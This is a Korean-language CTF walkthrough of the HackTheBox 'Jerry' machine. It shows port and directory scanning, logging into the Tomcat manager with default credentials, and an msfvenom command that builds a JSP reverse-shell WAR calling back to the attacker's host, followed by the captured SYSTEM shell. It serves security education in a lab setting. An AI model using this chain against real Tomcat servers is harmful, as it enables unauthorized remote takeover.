HackTheBox Walkthrough : Jerry

7451 단어 보안CTFHackTheBox
HackTheBox의 Jerry라는 머신의 공략을 비망록으로 기재해 갑니다.

틀린 곳도 있다고 생각합니다만 양해 바랍니다.

아래는 제가 작성한 페네트레이션 테스트의 치트 시트가 되고 있습니다, 흥미가 있으면 봐 주세요.

Information Gathering


nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan 10.10.10.95


PORT
서비스
VERSION


8080
HTTP
Apache Tomcat/Coyote JSP engine 1.1

Nmap scan report for 10.10.10.95
Host is up (0.29s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 open 
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|2008|7|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2008a::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%)ndows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows 7 SP1 or Windows Serv (85%), Microsoft Windows 7 Professional (85%), Microsoft Windows Server 2008 R2 (85
No exact OS matches for host (test conditions non-ideal).

OS and Service detection performed. Please report any incorrect results at https://n

8080번 포트에서 Tomcat 서버가 시작되고 있음을 알 수 있습니다.

여기서 gobuster 를 사용하여 디렉토리를 열거하십시오.
gobuster dir -u http://10.10.10.95:8080 -w /usr/share/wordlists/dirb/common.txt  -t 100
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.95:8080
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/02/01 08:55:31 Starting gobuster
===============================================================
/aux (Status: 200)
/com3 (Status: 200)
/com2 (Status: 200)
/com1 (Status: 200)
/con (Status: 200)
/docs (Status: 302)
/examples (Status: 302)
/favicon.ico (Status: 200)
/host-manager (Status: 302)
/lpt1 (Status: 200)
/lpt2 (Status: 200)
/manager (Status: 302)
/nul (Status: 200)
/prn (Status: 200)
===============================================================
2021/02/01 08:55:40 Finished
===============================================================

결과에서/maneger라는 디렉토리에 액세스하면 기본 인증이 있음을 알았습니다.



Tomcat의 기본 비밀번호를 살펴보면 아래 Github에 Username과 Password 세트가있었습니다.

하나씩 시도한 결과, Username과 Password 세트는 다음과 같은 것을 알았습니다.


사용자 이름
Password


tomcat
s3cret




manager/html에서는 war 파일을 업로드할 수 있는 것 같습니다.

Exploit



war 파일을 업로드 할 수 있으므로 역 쉘을 war 파일로 작성하여 업로드합니다.

우선, 리버스 쉘을 작성합니다.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f war > shell.war
kali@kali:~/Documents/Jerry$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f war > shell.war
Payload size: 1083 bytes
Final size of war file: 1083 bytes

방금 만든 리버스 셸을 업로드합니다.



업로드가 성공적으로 완료되었으며 Application 목록에 업로드한/shell이 ​​있음을 알 수 있습니다.



리버스 쉘을 실행하기 전에 netcat에서 리버스 쉘을 기다립니다.

/shell을 클릭하면 리버스 셸이 실행되고 nt authority\system 로 연결할 수 있습니다.
kali@kali:~/Documents/Jerry$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.95] 49203
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

C:\apache-tomcat-7.0.88>

면책 조항



본 기사는 정보 보안에 있어서의 공격의 이해, 방위의 스킬 향상을 목적으로 한 보안에 관한 내용이 있습니다. 본 기사의 내용을 사용하여 발생한 어떠한 손해나 손실에 대해서, 본 기사 작성자는 일절의 책임을 지지 않습니다.
본 기사의 내용을 실제로 사용하여 제3자의 개인이나 조직 등을 공격한 경우는 법률에 의해 처벌될 가능성이 있으므로 반드시 자신이 소유하고 있는 환경만을 대상으로 하여 타인이나 조직 가 소유하고 있는 환경은 결코 대상으로 하지 않도록 부탁합니다.

좋은 웹페이지 즐겨찾기